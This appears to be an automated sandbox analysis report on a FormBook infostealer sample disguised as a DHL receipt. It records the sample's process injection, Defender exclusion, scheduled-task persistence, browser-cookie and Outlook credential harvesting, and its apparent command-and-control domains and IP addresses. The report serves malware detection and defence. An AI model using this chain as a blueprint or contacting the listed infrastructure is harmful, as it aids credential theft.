                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeQueries volume information: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.4206977090.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1997895215.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.4209611684.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4208156839.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1996643989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2004019150.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4207191242.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4208178305.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.4206977090.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1997895215.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.4209611684.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4208156839.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1996643989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2004019150.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4207191242.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4208178305.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		612
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		612
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1629832 Sample: DHL AWB Receipt_pdf.bat.exe Startdate: 05/03/2025 Architecture: WINDOWS Score: 100 59 www.usastakes.xyz 2->59 61 www.031233435.xyz 2->61 63 17 other IPs or domains 2->63 75 Sigma detected: Scheduled temp file as task from temp location 2->75 77 Multi AV Scanner detection for submitted file 2->77 79 Yara detected FormBook 2->79 83 7 other signatures 2->83 10 DHL AWB Receipt_pdf.bat.exe 7 2->10         started        14 AYBPplggzXaXav.exe 5 2->14         started        signatures3 81 Performs DNS queries to domains with low reputation 61->81 process4 file5 51 C:\Users\user\AppData\...\AYBPplggzXaXav.exe, PE32 10->51 dropped 53 C:\...\AYBPplggzXaXav.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmp99C5.tmp, XML 10->55 dropped 57 C:\Users\...\DHL AWB Receipt_pdf.bat.exe.log, ASCII 10->57 dropped 93 Writes to foreign memory regions 10->93 95 Allocates memory in foreign processes 10->95 97 Adds a directory exclusion to Windows Defender 10->97 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        99 Multi AV Scanner detection for dropped file 14->99 101 Injects a PE file into a foreign processes 14->101 25 schtasks.exe 1 14->25         started        27 RegSvcs.exe 14->27         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 CLaoxM16clnn.exe 16->29 injected 73 Loading BitLocker PowerShell Module 19->73 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 103 Found direct / indirect Syscall (likely to bypass EDR) 29->103 42 EhStorAuthn.exe 29->42         started        process11 signatures12 85 Tries to steal Mail credentials (via file / registry access) 42->85 87 Tries to harvest and steal browser information (history, passwords, etc) 42->87 89 Modifies the context of a thread in another process (thread injection) 42->89 91 3 other signatures 42->91 45 CLaoxM16clnn.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 65 031233435.xyz 144.76.229.203, 49860, 49882, 49902 HETZNER-ASDE Germany 45->65 67 www.publicblockchain.xyz 13.248.169.48, 50052, 50053, 50054 AMAZON-02US United States 45->67 69 10 other IPs or domains 45->69 105 Found direct / indirect Syscall (likely to bypass EDR) 45->105 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.